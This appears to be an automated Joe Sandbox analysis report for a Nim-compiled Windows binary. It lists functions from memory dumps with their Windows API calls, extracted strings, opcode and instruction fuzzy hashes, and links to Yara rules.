Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: baec2f065d021a051a704794d8bb7c809266d99ca5928d5cc0ed3a2fd062640e
Instruction ID: 74f269971acd09acec0d4f90d02dd3ccd4bec9029e2862d28c16c38a5c02eca5
Opcode Fuzzy Hash: baec2f065d021a051a704794d8bb7c809266d99ca5928d5cc0ed3a2fd062640e
Instruction Fuzzy Hash: 5B1191B0E093888FDB10DFBAD48479AFBF4BB48354F109569E94097381D7749845CF51

Function 00EE6C64 Relevance: 3.0, APIs: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CLSIDFromString.COMBASE ref: 00EE6CB4
CLSIDFromProgID.COMBASE(?,?), ref: 00EE6CC6

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: From$ProgString
String ID:
API String ID: 2510552579-0
Opcode ID: 36f55850ca0040583fb4d5f76dc12e64e0a2e90e8aa4479df07050a2730aa28f
Instruction ID: dfa1d0afb5dab99b6704c6f3e3a808bd7da048e78b0b31e4cbbfc713d132de1b
Opcode Fuzzy Hash: 36f55850ca0040583fb4d5f76dc12e64e0a2e90e8aa4479df07050a2730aa28f
Instruction Fuzzy Hash: 6C0184B1904788BFC7206F65CC44A9BFFE8EF99390F15981DF48453201D6319850DB62

Function 00EE80E7 Relevance: 3.0, APIs: 2, Instructions: 39pipeCOMMON

Download Yara Rule

APIs

CreatePipe.KERNELBASE ref: 00EE812B
GetLastError.KERNEL32 ref: 00EE8138

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: CreateErrorLastPipe
String ID:
API String ID: 269057482-0
Opcode ID: 5a6a5c0a9d082f3a12c93c1c9a4771cfc6fdecb4d7881387640d7f9662771005
Instruction ID: 178e6fb723166bb7c939482e2b16dee3e3cc85cfe24fe101efdca0229b029ae1
Opcode Fuzzy Hash: 5a6a5c0a9d082f3a12c93c1c9a4771cfc6fdecb4d7881387640d7f9662771005
Instruction Fuzzy Hash: A301ADB0E043088FD700AFAADC8439EFBE8EF88354F008559E844A7253D7B988059F91

Function 00EE81EC Relevance: 2.5, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00EE81F6
GetLastError.KERNEL32 ref: 00EE8201

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 6e1c0ee68a3b1e2a0f5d2a11dfe10cde676a81673b30b8887594d88ffd64b8b5
Instruction ID: 840fe8f09e03eb9455094fcdcdf8fb703a08e5698dee8459e23552e435bbf026
Opcode Fuzzy Hash: 6e1c0ee68a3b1e2a0f5d2a11dfe10cde676a81673b30b8887594d88ffd64b8b5
Instruction Fuzzy Hash: AFE092B0B0468E9BCB00EBBAD98565A77E86B0C398F401058D54557253DA78D840ABA1

Function 00EE55BF Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

_wgetenv.MSVCRT ref: 00EE561E

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: _wgetenv
String ID:
API String ID: 1821490009-0
Opcode ID: c40aff3743cf51801e2e0f5eee33ab69df8a9de092cdf0de815cd258723ae3ec
Instruction ID: 70d73f40bf5b648155bdb602f8f4e0cb67d6d1364cf1ccfa006cb42ff860e7cb
Opcode Fuzzy Hash: c40aff3743cf51801e2e0f5eee33ab69df8a9de092cdf0de815cd258723ae3ec
Instruction Fuzzy Hash: 0F21F7B4D0064E9FCB04DFA5C591AAEBBF4BF84304F508429E855A7381D7749A41DFA1

Function 00EE2052 Relevance: 1.4, APIs: 1, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 00EE20C6

Part of subcall function 00EE1BE3: VirtualAlloc.KERNELBASE ref: 00EE1C04

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a796819e2a77192243d73a8b65c0ad7f865077cea555e6b552f30407ca627de1
Instruction ID: 43a0b36ec9ee0d018303614c43ecc870a96a62a55bcdf939d3c4e2fa8920bfd2
Opcode Fuzzy Hash: a796819e2a77192243d73a8b65c0ad7f865077cea555e6b552f30407ca627de1
Instruction Fuzzy Hash: E5417AB1A0424A8FC714CF6AC8847EABBE5AF84304F1881BDD948EF356EB75D941CB50

Function 00EEA58B Relevance: 1.3, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00EEA5BE

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 0c1cd497257422dab046fa966501c695fddd575c205f598553eaa2d0776ed3cb
Instruction ID: 31271c3ede1e05a150554c248e2d659cdfd0b1119467adf526b285f42609a97d
Opcode Fuzzy Hash: 0c1cd497257422dab046fa966501c695fddd575c205f598553eaa2d0776ed3cb
Instruction Fuzzy Hash: A2F0287290418C5BDF00AF75CC0039FBBE5EB85350F050428E284AB282CA796985A7A2

Function 00EE1BE3 Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00EE1C04

Part of subcall function 00EE1BBA: exit.MSVCRT ref: 00EE1BDE

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: AllocVirtualexit
String ID:
API String ID: 1690354023-0
Opcode ID: 32f7111a7596cc0c58469adab2e2173bd28a086f53f59d60df61731950908aef
Instruction ID: ab36736bc768018193c43e3b9efea70bd1c5086332b2d2b77821b581f5bb8da9
Opcode Fuzzy Hash: 32f7111a7596cc0c58469adab2e2173bd28a086f53f59d60df61731950908aef
Instruction Fuzzy Hash: A0D09EB05083459AE704BF79C51931ABEE49B40348F41859CD99596151F7B484848B97

Non-executed Functions

Function 00EEF6B7 Relevance: 17.4, APIs: 4, Strings: 5, Instructions: 1684COMMON

Download Yara Rule

Strings

@, xrefs: 00EF0958
VariantConversionError, xrefs: 00EF0CD2, 00EF0D21
com.nim, xrefs: 00EF0D30
toVariant, xrefs: 00EF0D38
<V, xrefs: 00EEFCF6

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID:
String ID: @$VariantConversionError$com.nim$toVariant$<V
API String ID: 0-1035723416
Opcode ID: 6b0017efc268166c910679e263ee5a85e7655079f400a47140f8b8aaa3078a65
Instruction ID: 54793df7b8bf05a683f39b4fc4f18672d375cd190048939205ee25bd3faeada7
Opcode Fuzzy Hash: 6b0017efc268166c910679e263ee5a85e7655079f400a47140f8b8aaa3078a65
Instruction Fuzzy Hash: 7BF205B0E0429DCFEB20DFAAC49479EBBF0BF44308F149569E554AB292DBB49845CF41

Function 00EF4227 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 405filepipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeW.KERNEL32 ref: 00EF4464
GetLastError.KERNEL32 ref: 00EF4486
CreateNamedPipeW.KERNEL32 ref: 00EF44E9
GetLastError.KERNEL32 ref: 00EF44FB
CreateFileW.KERNEL32 ref: 00EF455B
GetLastError.KERNEL32 ref: 00EF4581
CreateFileW.KERNEL32 ref: 00EF45DF
GetLastError.KERNEL32 ref: 00EF4605

Part of subcall function 00EE816B: GetCurrentProcess.KERNEL32 ref: 00EE817E
Part of subcall function 00EE816B: DuplicateHandle.KERNEL32 ref: 00EE81AA
Part of subcall function 00EE816B: GetLastError.KERNEL32 ref: 00EE81B7

Strings

, xrefs: 00EF424D

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: ErrorLast$Create$FileNamedPipe$CurrentDuplicateHandleProcess
String ID:
API String ID: 2980152811-3916222277
Opcode ID: c1d64f9bd9967df1a1204b882c9daa992da6b298b2fe38fafefbd6a44b94ef60
Instruction ID: cebd24d7926cc6e862c72c10af3a9f5911136804042273ab012dcd50d9e464bb
Opcode Fuzzy Hash: c1d64f9bd9967df1a1204b882c9daa992da6b298b2fe38fafefbd6a44b94ef60
Instruction Fuzzy Hash: 90126FB090429D8FEB20DF65C9847AEBBF0BF45304F10949AE589B7282E7749E85CF51

Function 00EEED20 Relevance: 14.6, APIs: 2, Strings: 6, Instructions: 600COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 00EEED8A
exit.MSVCRT ref: 00EEF1F0

Strings

writeFile, xrefs: 00EEF0C2
CF3, xrefs: 00EEEE96
IOError, xrefs: 00EEF05E, 00EEF0AA
syncio.nim, xrefs: 00EEF0BA
@, xrefs: 00EEF1A9
{3V2, xrefs: 00EEEF38

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: FileModuleNameexit
String ID: @$CF3$IOError$syncio.nim$writeFile${3V2
API String ID: 3381550187-2796672887
Opcode ID: a32a8db7c62fd2e94d192c7c794a658de6f18f9979e65bc14218121ac3c4a8d4
Instruction ID: edd0f22dc0f00d22cedd13ff33f92da8ce27944396e1b683ceb901e099426fd8
Opcode Fuzzy Hash: a32a8db7c62fd2e94d192c7c794a658de6f18f9979e65bc14218121ac3c4a8d4
Instruction Fuzzy Hash: 1452E2B0D0429CCBEB24DFAAD49479EBBF1BF44308F14912AE454AB295DBB49849CF41

Function 00EE15A0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00EE15B0
LoadLibraryA.KERNEL32 ref: 00EE15C6
GetProcAddress.KERNEL32 ref: 00EE15E5
GetProcAddress.KERNEL32 ref: 00EE15F7

Strings

__register_frame_info, xrefs: 00EE15DA
__deregister_frame_info, xrefs: 00EE15EC
libgcc_s_dw2-1.dll, xrefs: 00EE15A9, 00EE15BF

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: 2a20a494e5bd57f2d27e63e0bf20a31e087a3d3e965c40b1b4fb85bf8f975db5
Instruction ID: 524f31e2f09257574a54fd2511d9eaa038966ecd62a81e52e2a2d4fea952e0b1
Opcode Fuzzy Hash: 2a20a494e5bd57f2d27e63e0bf20a31e087a3d3e965c40b1b4fb85bf8f975db5
Instruction Fuzzy Hash: 7C0184B18092489BC7007FB9A90929EBFF4EB44341F06456DD989A7245D7B08849EBD3

Function 00F01651 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00F0B650
abort.MSVCRT ref: 00F0B655

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: cb42a8986869489169f5aecce8518cf5f67fc2ae1588cbee1365d47dac422884
Instruction ID: 7fe2c9cd57e4889cd87c2e53eedd033811aeaced9075426ed91565861bd5779e
Opcode Fuzzy Hash: cb42a8986869489169f5aecce8518cf5f67fc2ae1588cbee1365d47dac422884
Instruction Fuzzy Hash: 0DE08C70C093009EDB107F2489023AAB6E4BF81348F452C4CE89823283EB3994897796

Function 00EFCE7D Relevance: 1.7, Strings: 1, Instructions: 437COMMON

Download Yara Rule

Strings

gfff, xrefs: 00EFD169

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: 0073a8cf0da60cb04c71dd4f934285ee406274152f31b0e2a9521934299919e5
Instruction ID: e8acabce20ce27eb6df48c6d91ebe49bf23b748757233e87044cc5bab6d6b67a
Opcode Fuzzy Hash: 0073a8cf0da60cb04c71dd4f934285ee406274152f31b0e2a9521934299919e5
Instruction Fuzzy Hash: 0812C475E0430A8FDB04CFA9C985AAEBBF2AF58350F149125E948EB351E734ED41CB90

Function 00EEE078 Relevance: .6, Instructions: 574COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 1dcb7d983feff556881198f30038af6ca7f12b7be2c197ea862e8010217394aa
Instruction ID: 3048d7635f3920ca20f3c19fc6079285494eab13100aa7302cf7e31d4930a9ef
Opcode Fuzzy Hash: 1dcb7d983feff556881198f30038af6ca7f12b7be2c197ea862e8010217394aa
Instruction Fuzzy Hash: 324226B0D042AC8BEB219F66C89579DBBF1BB55308F00909AD498BB386DB744985DF42

Function 00EEAA69 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e97695afb617a3f923c6b3b59cb640a9f43eabd5f12d7ba363e01811b228366d
Instruction ID: db79deb4ffc1ab74ab7e8c966eb4632c919b74431dc1fb953d740710b639a6c0
Opcode Fuzzy Hash: e97695afb617a3f923c6b3b59cb640a9f43eabd5f12d7ba363e01811b228366d
Instruction Fuzzy Hash: C06191B5E0429C9FDB11DFAAD88069EFBF5BF48314F18A52DE854B7341C734A8019B92

Function 00EFB610 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f34ab0970795ce4c984d1a3aec6b80fbb63f1c6f645651df4128e3d80a54c061
Instruction ID: 37093635fb9488336f7e29401e940fc7e8e13a9c293e609c6f9571b9b63b86b8
Opcode Fuzzy Hash: f34ab0970795ce4c984d1a3aec6b80fbb63f1c6f645651df4128e3d80a54c061
Instruction Fuzzy Hash: F2513B757083198FC714DE69D48462BF7E2ABC8710F11892EE998D7340E771EC19CB82

Function 00F014D0 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 095c74716efd8bddd4451833ac99d74df168eb62f009fcb5752a56a238bec1d2
Instruction ID: 4ca9c3d5a9292512d08901c9c450441b59752ba9cb734c738582d9a5f89219e5
Opcode Fuzzy Hash: 095c74716efd8bddd4451833ac99d74df168eb62f009fcb5752a56a238bec1d2
